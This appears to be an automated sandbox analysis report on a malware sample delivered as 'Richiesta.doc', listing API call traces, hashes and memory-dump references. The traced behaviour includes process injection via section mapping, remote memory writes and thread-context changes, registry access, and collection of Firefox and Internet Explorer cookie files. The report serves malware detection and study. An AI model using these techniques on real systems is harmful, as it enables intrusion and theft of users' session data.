    • Part of subcall function 001C2416: GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
    • Part of subcall function 001C2416: HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
  • GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
    • Part of subcall function 001C1473: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001C1473: wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001C1473: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D87D7, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: f4522468b970ccd3281ff04b4b9d6df2f9b0077f1de15eaad5e61c015f0d6d70
  • Instruction ID: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
  • Opcode Fuzzy Hash: 2401C052096E60C8F032AD0A54AA77BF147FF917F6D0DFB0064C23028B4E81A1E61FC9
  • Instruction Fuzzy Hash: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
APIs
  • memset.NTDLL ref: 001D87FD
  • memcpy.NTDLL ref: 001D8825
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
  • GetLastError.KERNEL32(00000010,00000218,001E3E3D,00000100,?,00000318,00000008), ref: 001D883C
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,001E3E3D,00000100), ref: 001D891F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE2F9, Relevance: 5.1, APIs: 4, Instructions: 70 Total matches: 113string
Similarity
  • Total matches: 113
  • API ID: lstrcpy$lstrlenmemcpy
  • String ID:
  • API String ID: 2435105219-0
  • Opcode ID: 389011caf0b95c7600b8c5e44240e3f54a572d070d9ef14607482dffdfcb44a1
  • Instruction ID: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
  • Opcode Fuzzy Hash: 19E06834C20EC8A2C527204C1072F45A784999153B9CDA3E7647629AD54E023016720F
  • Instruction Fuzzy Hash: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
APIs
  • lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE305
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE363
  • lstrcpy.KERNEL32(00000000,00000008), ref: 001DE373
  • lstrcpy.KERNEL32(00000000,00000000), ref: 001DE37F
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

Process Name: cmd.exe Analysis ID: 51301

General

Root Process Name:d3d8sext.exe
Process MD5:AD7B9C14083B52BC532FBA5948342B98
Total matches:133
Initial Analysis Report:Open
Initial sample Analysis ID:51301
Initial sample SHA 256:ECD47F4204DA14A45CB2BBAE813C2AAA7980B92A91BA2855669D3F1BE25BEF12
Initial sample name:Richiesta.doc

Similar Executed Functions

Function 001D99D2, Relevance: 10.6, APIs: 7, Instructions: 81 Total matches: 84native
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: 14313892d018c28c1512d211c24bd9508d3a727c070e1f2f8c81eb1ee10ca15e
  • Instruction ID: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
  • Opcode Fuzzy Hash: 65E061A35807C6FB51DA20701C03DE6D691FE10790C4C5B26D4F82D1864E5574794B07
  • Instruction Fuzzy Hash: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
APIs
  • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
  • NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
  • memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • NtClose.NTDLL(001EC638), ref: 001D9A84
  • NtClose.NTDLL(?), ref: 001D9A8E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B33880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 57d5b69842fa9f20cc0ac7374aaf72f9f3e4042206c472131978e9752df15512
  • Instruction ID: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
  • Opcode Fuzzy Hash: 09F078400B9F90E6E812A68604A2F406692FF06E75E0EE32475F211B8A3F12311D8B06
  • Instruction Fuzzy Hash: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
APIs
  • memset.NTDLL ref: 01B338A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 01B33995
    • Part of subcall function 01B33E68: NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
    • Part of subcall function 01B33E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
    • Part of subcall function 01B33E68: SetLastError.KERNEL32(00000000), ref: 01B33EA7
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
  • memcpy.NTDLL(00000218,01B34F92,00000100,?,00010003,?,?,00000318,00000008), ref: 01B3391D
    • Part of subcall function 01B33E27: NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
    • Part of subcall function 01B33E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
    • Part of subcall function 01B33E27: SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 01B33974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33977
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B3278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: f060986f037786d6eff44f917c1f9cd1492eae5187663b5233982b63c154d879
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: A6E0C00114CEC4E7E9F2B8060843B2BA0507FC0942E5D7BA173A88952F1F20B012070A
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
  • memset.NTDLL ref: 01B3280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
  • NtClose.NTDLL(?), ref: 01B3283F
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001F1040, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 226 Total matches: 134native
Similarity
  • Total matches: 134
  • API ID: NtProtectVirtualMemory
  • String ID: z
  • API String ID: 1546459799-1657960367
  • Opcode ID: cf60b7cb83ce32be4ff946b1fad70a6d95e18f7d6e657a237c07f6ddb8ba3109
  • Instruction ID: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
  • Opcode Fuzzy Hash: C321CD43048F92C7E9BB64801117F962385FBA3C6AD88FB625EA0576571F0036079FAB
  • Instruction Fuzzy Hash: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
APIs
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F11E1
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F124B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665752385.001F1000.00000040.sdmp, Offset: 001F1000, based on PE: false
Function 01B33E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 09b8888f5fea2438ba07c33a5d99fafd9b808ca60c6c542fde1a50af119b8c2c
  • Instruction ID: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
  • Opcode Fuzzy Hash: 42C012800D5D81E6957F54890169A165197BB91600C3D73363184AD5807FA032190F09
  • Instruction Fuzzy Hash: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
APIs
  • NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
  • SetLastError.KERNEL32(00000000), ref: 01B33EA7
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B33DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: 153371e7e4f27683f8f1e7324a073917f20e70acda51c493c57c8daf0af629c8
  • Instruction ID: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
  • Opcode Fuzzy Hash: 09C09BC7021DC54DD779698201B5C45C1C57EB177243C710D5054DD31D518931274E85
  • Instruction Fuzzy Hash: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
  • SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B33E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 36b500c4af3d78682ecbfd6e0cb23a776f8586d0295add1c103b4d2a2a554bea
  • Instruction ID: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
  • Opcode Fuzzy Hash: 9EC09B87020DC54DD779694101B9C45C0C57FB177243C710D5058DD31D518931274F85
  • Instruction Fuzzy Hash: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
  • SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001CD171, Relevance: 9.1, APIs: 6, Instructions: 67 Total matches: 31thread
Similarity
  • Total matches: 31
  • API ID: CreateEventGetLastErrorInterlockedDecrementOpenEventRtlExitUserThreadWaitForMultipleObjects
  • String ID:
  • API String ID: 420885392-0
  • Opcode ID: d33af0a5ccd8da24651d90541fd71a469b169468326c88d3ba2cd7f680d024ee
  • Instruction ID: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
  • Opcode Fuzzy Hash: 38E02B3406094157223F70A4A211B7F4ED8F8872C268D638BFC283D2AD5A0791E62557
  • Instruction Fuzzy Hash: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
APIs
  • OpenEventA.KERNEL32(00100000,00000000), ref: 001CD1A0
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001CD1BB
  • GetLastError.KERNEL32 ref: 001CD1C8
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CD1EB
  • InterlockedDecrement.KERNEL32(001EAF4C), ref: 001CD217
    • Part of subcall function 001C13D6: SetEvent.KERNEL32(001EB094,001CD22D), ref: 001C13E0
    • Part of subcall function 001C13D6: CloseHandle.KERNEL32(001EB094), ref: 001C13F5
    • Part of subcall function 001C13D6: HeapDestroy.KERNELBASE(001EAF48), ref: 001C1405
  • RtlExitUserThread.NTDLL(00000000), ref: 001CD22E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D77D8, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 97memory
Similarity
  • Total matches: 97
  • API ID: VirtualProtect$GetLastErrorRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2510858262-0
  • Opcode ID: 79e378e90741fe03a1868ff575f465e1dcc9b1d4b7d085768b56240e49bf8d92
  • Instruction ID: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
  • Opcode Fuzzy Hash: B2019C28149E95B7D43BB0841C52EC1C254BB53294C1D6372E892241C73F007709BB19
  • Instruction Fuzzy Hash: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
APIs
    • Part of subcall function 001D75AC: GetLastError.KERNEL32(00000024,?,001D7807,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?,?,00000000,001E5050,00000000), ref: 001D75D9
    • Part of subcall function 001D9FF2: lstrcmpi.KERNEL32(?,00000000), ref: 001DA027
  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?), ref: 001D7865
  • VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,001CB2EF), ref: 001D789F
  • RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D78E5
    • Part of subcall function 001D7646: lstrlen.KERNEL32(00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7678
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7692
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D76C5
  • RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D78C7
  • GetLastError.KERNEL32(?,001CB2EF), ref: 001D78FA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DA098: lstrcmpi.KERNEL32(?,00000000), ref: 001DA0DC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D8325, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 334b4ad23c3ebcab69ace51bbaeeff1e78eacdd0a0d3c55371ac3bd1638c0514
  • Instruction ID: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
  • Opcode Fuzzy Hash: 4CD05EF84B9C968B402B7450581D36CA586B9D12C5ACC3663F326A685EAB11B3D0477A
  • Instruction Fuzzy Hash: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
APIs
  • GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
  • GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
  • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
  • IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
  • CloseHandle.KERNEL32(00000000), ref: 001D8391
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3D4D, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97 Total matches: 38registry
Similarity
  • Total matches: 38
  • API ID: RegCloseKeyRegQueryValueExwsprintf
  • String ID: Client
  • API String ID: 1809512201-3236430179
  • Opcode ID: 9042b19d19dd4b3d942996e0d3ea8ecf2d3d2b777e835d7718659b5b290a5e22
  • Instruction ID: bd4461f6c7afc55672d071394b4a111d53588a956b6005c1a3bb12a79494774e
  • Opcode Fuzzy Hash: 8CF04634A804C58A8693A885092A7FC4571B352AEECCCBF20F15852181FFC977D73B11
  • Instruction Fuzzy Hash: bd4461f6c7afc55672d071394b4a111d53588a956b6005c1a3bb12a79494774e
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(001CD70D,Client,00000000,?,001EA06C,?,00000001,001CD70D,00000000,00000000,00000001,?,?,00000000,001CD70D), ref: 001C3D98
    • Part of subcall function 001DE1CF: RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
    • Part of subcall function 001DE1CF: HeapFree.KERNEL32(00000000,?), ref: 001DE242
    • Part of subcall function 001DE1CF: GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
    • Part of subcall function 001DE1CF: RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
    • Part of subcall function 001DE1CF: GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
    • Part of subcall function 001DE1CF: HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
  • RegCloseKey.ADVAPI32(001CD70D,?,?,00000000,001CD70D,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C3DE1
  • wsprintfA.USER32 ref: 001C3E55
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B33368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: f05951512fc70493bcc218ada1478013eab1d332df878026975bea813deea018
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 32E026401A9D83C9C64754854852F22B264E764646DACF7626718BF232AF263236DF2A
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 01B33C8B: GetModuleFileNameW.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB1
    • Part of subcall function 01B33C8B: GetModuleFileNameA.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB9
    • Part of subcall function 01B33C8B: GetLastError.KERNEL32(?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000,?,?,?,01B317BE), ref: 01B33CF7
    • Part of subcall function 01B348FB: lstrcmp.KERNEL32(?,01B37494), ref: 01B349A8
    • Part of subcall function 01B348FB: lstrlen.KERNEL32(?,00000000,00000000,01B31852), ref: 01B349B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01B333BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,01B31BAF,01B38451), ref: 01B333CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 01B333E5
  • CloseHandle.KERNEL32(?), ref: 01B33400
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C3C55, Relevance: 6.1, APIs: 4, Instructions: 67 Total matches: 64memoryregistry
Similarity
  • Total matches: 64
  • API ID: HeapFreeRegCloseKeyRegQueryValueExRtlAllocateHeap
  • String ID:
  • API String ID: 1519508758-0
  • Opcode ID: 2c20f16d7cb35b0837f37e1f163c74e89bf46e78e287d7b3e7984998dc48fbe4
  • Instruction ID: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
  • Opcode Fuzzy Hash: BFE07DE10F45C256111F7D4A647FA76C310CC440D130C7313BD74596BD0E43301B8709
  • Instruction Fuzzy Hash: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
  • HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3BF0, Relevance: 4.5, APIs: 3, Instructions: 39 Total matches: 129registrystring
Similarity
  • Total matches: 129
  • API ID: RegCreateKeyRegOpenKeylstrlen
  • String ID:
  • API String ID: 3913359509-0
  • Opcode ID: 4a10325c95453f6cc476ef8e5a47647315785bf9e091164d0adb2aeafd4fec03
  • Instruction ID: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
  • Opcode Fuzzy Hash: 9CD0A934820C8ACBC02B88001C6AA2A80A0AB010C2C8C627278C23912B2F9072892EA5
  • Instruction Fuzzy Hash: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
APIs
  • RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
  • RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
  • lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

Similar Non-Executed Functions

Function 001C1C50, Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 158 Total matches: 59memorystringfile
Similarity
  • Total matches: 59
  • API ID: HeapFree$RtlAllocateHeaplstrcat$CreateDirectoryDeleteFilelstrlenmbstowcs
  • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
  • API String ID: 2820067504-4232923486
  • Opcode ID: 3d14cf29faf766bfeb75039b264b2d7cbadb4797a584a71d88c970bf056bfa6f
  • Instruction ID: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
  • Opcode Fuzzy Hash: A2118CB00A05034BC02BA862E5AA37F4981BE835C4C4D1763FE05AB12E1F5731E67F0B
  • Instruction Fuzzy Hash: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
APIs
  • lstrlen.KERNEL32(%APPDATA%), ref: 001C1C68
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C1CB3
  • mbstowcs.NTDLL ref: 001C1CC6
  • lstrcatW.KERNEL32(00000000,001EC804), ref: 001C1CD5
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C1CF9
  • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 001C1D0B
  • lstrcatW.KERNEL32(00000000,001E53C0), ref: 001C1D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1D51
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 001C1D77
    • Part of subcall function 001C1B85: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
    • Part of subcall function 001C1B85: lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
